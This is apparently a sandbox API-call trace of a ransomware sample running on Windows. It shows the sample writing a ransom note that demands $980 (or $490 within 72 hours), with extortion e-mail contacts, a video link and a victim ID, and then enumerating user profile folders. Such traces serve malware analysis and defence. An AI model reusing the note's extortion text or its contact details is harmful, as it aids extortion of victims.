[0094.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0094.228] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0094.228] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0094.230] CloseHandle (hObject=0x5c8) returned 1 [0094.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0094.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0094.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0094.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.243] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fba0 [0094.243] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa1b2ca60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b2ca60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.243] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fba0 | out: hHeap=0x630000) returned 1 [0094.243] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa1b2ca60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b2ca60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.243] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0094.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318be0 [0094.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33185b0 [0094.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c) returned 0x332fd20 [0094.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33186b8 [0094.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33185b0 | out: hHeap=0x630000) returned 1 [0094.244] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318be0 | out: hHeap=0x630000) returned 1 [0094.244] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0094.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0094.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0094.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x38) returned 0x3331b88 [0094.244] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318be0 [0094.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33186b8 | out: hHeap=0x630000) returned 1 [0094.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0094.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0094.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0094.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0094.245] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0094.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33186b8 [0094.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33185b0 [0094.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x54) returned 0x3338dc8 [0094.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d98 [0094.245] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0094.245] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318be0 | out: hHeap=0x630000) returned 1 [0094.246] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0094.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33186b8 [0094.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33185b0 [0094.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0094.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d40 [0094.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0094.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33184a8 [0094.246] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8926dae0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x8926dae0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0094.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33186b8 [0094.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33185b0 [0094.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa8) returned 0x32b2de0 [0094.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d98 [0094.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0094.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0094.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0094.247] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fd3f350, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fd3f350, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0094.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33186b8 [0094.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x3336348 [0094.247] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0094.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33186b8 [0094.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x3336348 [0094.247] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0094.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318be0 [0094.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x3336348 [0094.248] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0094.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318be0 [0094.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0094.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0094.248] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0094.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0094.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16c) returned 0x9b94968 [0094.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318be0 [0094.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce068 [0094.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0094.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d98 [0094.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318138 [0094.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce340 [0094.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0094.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce410 [0094.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.249] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fdfda30, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fdfda30, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0094.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0094.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d40 [0094.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33184a8 [0094.249] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0094.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0094.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0094.250] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0094.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0094.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d40 [0094.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33185b0 [0094.250] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c30f920, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2c30f920, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0094.250] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c16ca00, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0094.250] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0094.250] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0094.250] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0094.250] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0094.250] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0094.250] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa04896b0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa04896b0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0094.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d40 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x214) returned 0x32d0958 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33186b8 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318ea0 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x710ee8 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x710e90 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce1a0 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce270 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x69b948 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce478 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x69b9a0 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce4e0 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x69b9f8 [0094.251] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x3336348 [0094.251] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d40 [0094.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33184a8 [0094.252] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0094.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0094.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce410 [0094.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0094.252] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0094.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 